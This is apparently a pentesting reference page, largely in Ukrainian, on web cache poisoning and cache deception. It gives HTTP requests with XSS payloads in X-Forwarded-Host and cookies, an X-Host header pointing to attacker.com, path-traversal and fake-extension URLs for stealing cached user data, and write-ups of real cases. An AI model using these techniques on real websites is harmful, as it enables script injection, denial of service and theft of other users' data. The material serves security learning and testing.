Cache Poisoning and Cache Deception

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

The difference

Яка різниця між отруєнням кешу веб-додатків та обманом кешу веб-додатків?

• У отруєнні кешу веб-додатків зловмисник змушує додаток зберігати деякий шкідливий контент у кеші, і цей контент надається з кешу іншим користувачам додатка.

• У обмані кешу веб-додатків зловмисник змушує додаток зберігати деякий чутливий контент, що належить іншому користувачу, у кеші, а потім зловмисник отримує цей контент з кешу.

Cache Poisoning

Отруєння кешу спрямоване на маніпулювання кешем на стороні клієнта, щоб змусити клієнтів завантажувати ресурси, які є несподіваними, частковими або під контролем зловмисника. Ступінь впливу залежить від популярності ураженої сторінки, оскільки забруднена відповідь надається виключно користувачам, які відвідують сторінку під час періоду забруднення кешу.

Виконання атаки отруєння кешу включає кілька етапів:

1. Ідентифікація незаключених параметрів: Це параметри, які, хоча й не є обов'язковими для кешування запиту, можуть змінити відповідь, що повертається сервером. Ідентифікація цих параметрів є критично важливою, оскільки їх можна використовувати для маніпуляції кешем.

2. Експлуатація незаключених параметрів: Після ідентифікації незаключених параметрів наступним кроком є з'ясування, як зловживати цими параметрами, щоб змінити відповідь сервера на користь зловмисника.

3. Забезпечення кешування отруєної відповіді: Останній крок полягає в тому, щоб переконатися, що маніпульована відповідь зберігається в кеші. Таким чином, будь-який користувач, який отримує доступ до ураженої сторінки під час отруєння кешу, отримає забруднену відповідь.

Discovery: Check HTTP headers

Зазвичай, коли відповідь була збережена в кеші, буде заголовок, що це вказує, ви можете перевірити, на які заголовки слід звернути увагу в цьому пості: HTTP Cache headers.

Discovery: Caching error codes

Якщо ви думаєте, що відповідь зберігається в кеші, ви можете спробувати надіслати запити з неправильним заголовком, на які має бути відповідь з кодом статусу 400. Потім спробуйте отримати доступ до запиту нормально, і якщо відповідь має статус-код 400, ви знаєте, що це вразливо (і ви навіть можете виконати DoS).

Ви можете знайти більше варіантів у:

Однак зверніть увагу, що іноді такі коди статусу не кешуються, тому цей тест може бути ненадійним.

Discovery: Identify and evaluate unkeyed inputs

Ви можете використовувати Param Miner для грубої сили параметрів і заголовків, які можуть змінювати відповідь сторінки. Наприклад, сторінка може використовувати заголовок X-Forwarded-For, щоб вказати клієнту завантажити скрипт звідти:

<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>

Викликати шкідливу відповідь від серверу

З ідентифікованим параметром/заголовком перевірте, як він санітується і де він відображається або впливає на відповідь з заголовка. Чи можете ви зловживати цим (виконати XSS або завантажити JS-код, контрольований вами? виконати DoS?...)

Отримати відповідь в кеші

Якщо ви ідентифікували сторінку, яку можна зловживати, який параметр/заголовок використовувати і як його зловживати, вам потрібно отримати сторінку в кеш. Залежно від ресурсу, який ви намагаєтеся отримати в кеш, це може зайняти деякий час, вам, можливо, доведеться намагатися кілька секунд.

Заголовок X-Cache у відповіді може бути дуже корисним, оскільки він може мати значення miss, коли запит не був кешований, і значення hit, коли він кешований. Заголовок Cache-Control також цікавий, щоб дізнатися, чи ресурс кешується і коли наступного разу ресурс буде кешований знову: Cache-Control: public, max-age=1800

Ще один цікавий заголовок - Vary. Цей заголовок часто використовується для вказівки додаткових заголовків, які розглядаються як частина ключа кешу, навіть якщо вони зазвичай не мають ключа. Тому, якщо користувач знає User-Agent жертви, на яку він націлений, він може отруїти кеш для користувачів, які використовують цей конкретний User-Agent.

Ще один заголовок, пов'язаний з кешем, - Age. Він визначає час у секундах, протягом якого об'єкт перебуває в проксі-кеші.

При кешуванні запиту будьте обережні з заголовками, які ви використовуєте, оскільки деякі з них можуть бути використані несподівано як ключові, і жертва повинна буде використовувати той самий заголовок. Завжди тестуйте отруєння кешу з різними браузерами, щоб перевірити, чи це працює.

Приклади експлуатації

Найпростіший приклад

Заголовок, як-от X-Forwarded-For, відображається у відповіді без санітизації. Ви можете надіслати базовий XSS-пейлоад і отруїти кеш, щоб усі, хто отримує доступ до сторінки, були XSSed:

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"

Зверніть увагу, що це отруїть запит до /en?region=uk, а не до /en

Отруєння кешу для DoS

Використання отруєння веб-кешу для експлуатації вразливостей обробки куків

Куки також можуть бути відображені у відповіді сторінки. Якщо ви зможете зловживати цим, щоб викликати XSS, наприклад, ви зможете експлуатувати XSS у кількох клієнтах, які завантажують шкідливу відповідь кешу.

GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"

Зверніть увагу, що якщо вразливий cookie дуже часто використовується користувачами, регулярні запити очищатимуть кеш.

Генерація розбіжностей з роздільниками, нормалізацією та крапками

Перевірте:

Отруєння кешу з обходом шляху для викрадення API ключа

Цей звіт пояснює, як було можливим викрасти API ключ OpenAI за допомогою URL на кшталт https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123, оскільки все, що відповідає /share/*, буде кешуватися без нормалізації URL Cloudflare, що було зроблено, коли запит досяг веб-сервера.

Це також краще пояснюється в:

Використання кількох заголовків для експлуатації вразливостей отруєння веб-кешу

Іноді вам потрібно буде експлуатувати кілька неключових вхідних даних, щоб мати можливість зловживати кешем. Наприклад, ви можете знайти Відкритий редирект, якщо ви встановите X-Forwarded-Host на домен, контрольований вами, і X-Forwarded-Scheme на http. Якщо сервер пересилає всі HTTP запити на HTTPS і використовує заголовок X-Forwarded-Scheme як ім'я домену для редиректу. Ви можете контролювати, куди вказується сторінка за допомогою редиректу.

GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http

Використання з обмеженим Vary заголовком

Якщо ви виявили, що X-Host заголовок використовується як ім'я домену для завантаження JS ресурсу, але Vary заголовок у відповіді вказує на User-Agent. Тоді вам потрібно знайти спосіб ексфільтрувати User-Agent жертви та отруїти кеш, використовуючи цей User-Agent:

GET / HTTP/1.1
Host: vulnerbale.net
User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com

Fat Get

Відправте GET запит з запитом в URL та в тілі. Якщо веб-сервер використовує той, що в тілі, але кеш-сервер кешує той, що в URL, будь-хто, хто отримує доступ до цього URL, насправді використовуватиме параметр з тіла. Як у вразливості, яку знайшов Джеймс Кеттл на сайті Github:

GET /contact/report-abuse?report=albinowax HTTP/1.1
Host: github.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

report=innocent-victim

There it a portswigger lab about this: https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get

Parameter Cloacking

Наприклад, можливо розділити параметри на ruby серверах, використовуючи символ ; замість &. Це може бути використано для вставлення значень непараметризованих параметрів всередину параметрів з ключами та їх зловживання.

Portswigger lab: https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking

Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling

Дізнайтеся тут, як виконати атаки Cache Poisoning, зловживаючи HTTP Request Smuggling.

Automated testing for Web Cache Poisoning

Web Cache Vulnerability Scanner може бути використаний для автоматичного тестування на наявність вразливостей до web cache poisoning. Він підтримує багато різних технік і є високонастроюваним.

Приклад використання: wcvs -u example.com

Vulnerable Examples

Apache Traffic Server (CVE-2021-27577)

ATS переслав фрагмент всередині URL без його видалення і згенерував ключ кешу, використовуючи лише хост, шлях і запит (ігноруючи фрагмент). Тому запит /#/../?r=javascript:alert(1) був надісланий на бекенд як /#/../?r=javascript:alert(1), і ключ кешу не містив payload, лише хост, шлях і запит.

GitHub CP-DoS

Відправка неправильного значення в заголовку content-type викликала кешовану відповідь 405. Ключ кешу містив cookie, тому було можливо атакувати лише неавторизованих користувачів.

GitLab + GCP CP-DoS

GitLab використовує GCP buckets для зберігання статичного контенту. GCP Buckets підтримують заголовок x-http-method-override. Тому було можливо надіслати заголовок x-http-method-override: HEAD і отруїти кеш, щоб він повертав порожнє тіло відповіді. Це також могло підтримувати метод PURGE.

Rack Middleware (Ruby on Rails)

У додатках Ruby on Rails часто використовується Rack middleware. Мета коду Rack полягає в тому, щоб взяти значення заголовка x-forwarded-scheme і встановити його як схему запиту. Коли надсилається заголовок x-forwarded-scheme: http, відбувається перенаправлення 301 на те ж місце, що може призвести до відмови в обслуговуванні (DoS) цього ресурсу. Крім того, додаток може визнати заголовок X-forwarded-host і перенаправити користувачів на вказаний хост. Ця поведінка може призвести до завантаження JavaScript файлів з сервера зловмисника, що становить загрозу безпеці.

403 and Storage Buckets

Cloudflare раніше кешував відповіді 403. Спроба доступу до S3 або Azure Storage Blobs з неправильними заголовками авторизації призводила до відповіді 403, яка кешувалася. Хоча Cloudflare припинив кешування відповідей 403, ця поведінка може все ще бути присутня в інших проксі-сервісах.

Injecting Keyed Parameters

Кеші часто включають специфічні GET параметри в ключ кешу. Наприклад, Varnish від Fastly кешував параметр size у запитах. Однак, якщо URL-кодована версія параметра (наприклад, siz%65) також була надіслана з помилковим значенням, ключ кешу буде сформований, використовуючи правильний параметр size. Проте бекенд обробляв значення в URL-кодованому параметрі. URL-кодування другого параметра size призвело до його пропуску кешем, але його використання бекендом. Призначення значення 0 для цього параметра призвело до кешованої помилки 400 Bad Request.

User Agent Rules

Деякі розробники блокують запити з user-agent, які відповідають інструментам з високим трафіком, таким як FFUF або Nuclei, щоб управляти навантаженням на сервер. Іронічно, цей підхід може ввести вразливості, такі як отруєння кешу та DoS.

Illegal Header Fields

RFC7230 визначає прийнятні символи в іменах заголовків. Заголовки, що містять символи поза вказаним діапазоном tchar, повинні ідеально викликати відповідь 400 Bad Request. На практиці сервери не завжди дотримуються цього стандарту. Помітним прикладом є Akamai, який пересилає заголовки з недійсними символами і кешує будь-яку помилку 400, якщо заголовок cache-control відсутній. Було виявлено експлуатовану схему, де надсилання заголовка з недійсним символом, таким як \, призводило до кешованої помилки 400 Bad Request.

Finding new headers

https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6

Cache Deception

Мета Cache Deception полягає в тому, щоб змусити клієнтів завантажувати ресурси, які будуть збережені кешем з їх чутливою інформацією.

Перш за все, зверніть увагу, що розширення, такі як .css, .js, .png тощо, зазвичай конфігуровані для збереження в кеші. Тому, якщо ви отримуєте доступ до www.example.com/profile.php/nonexistent.js, кеш, ймовірно, зберігатиме відповідь, оскільки бачить розширення .js. Але, якщо додаток відповідає з чутливими даними користувача, збереженими в www.example.com/profile.php, ви можете вкрасти ці дані у інших користувачів.

Інші речі для тестування:

• www.example.com/profile.php/.js

• www.example.com/profile.php/.css

• www.example.com/profile.php/test.js

• www.example.com/profile.php/../test.js

• www.example.com/profile.php/%2e%2e/test.js

• Використовуйте менш відомі розширення, такі як .avif

Ще один дуже чіткий приклад можна знайти в цьому звіті: https://hackerone.com/reports/593712. У прикладі пояснюється, що якщо ви завантажите неіснуючу сторінку, таку як http://www.example.com/home.php/non-existent.css, вміст http://www.example.com/home.php (з чутливою інформацією користувача) буде повернуто, і сервер кешу збереже результат. Тоді зловмисник може отримати доступ до http://www.example.com/home.php/non-existent.css у своєму браузері та спостерігати за конфіденційною інформацією користувачів, які отримували доступ раніше.

Зверніть увагу, що кеш-проксі повинні бути сконфігуровані для кешування файлів на основі розширення файлу (.css) і не на основі content-type. У прикладі http://www.example.com/home.php/non-existent.css буде мати content-type text/html замість text/css mime type (що є очікуваним для .css файлу).

Дізнайтеся тут, як виконати атаки Cache Deceptions, зловживаючи HTTP Request Smuggling.

Automatic Tools

• toxicache: сканер на Golang для виявлення вразливостей до web cache poisoning у списку URL-адрес і тестування кількох технік ін'єкцій.

References

• https://portswigger.net/web-security/web-cache-poisoning

• https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities

• https://hackerone.com/reports/593712

• https://youst.in/posts/cache-poisoning-at-scale/

• https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9

• https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/

Використовуйте Trickest, щоб легко створювати та автоматизувати робочі процеси, що базуються на найсучасніших інструментах спільноти. Отримайте доступ сьогодні: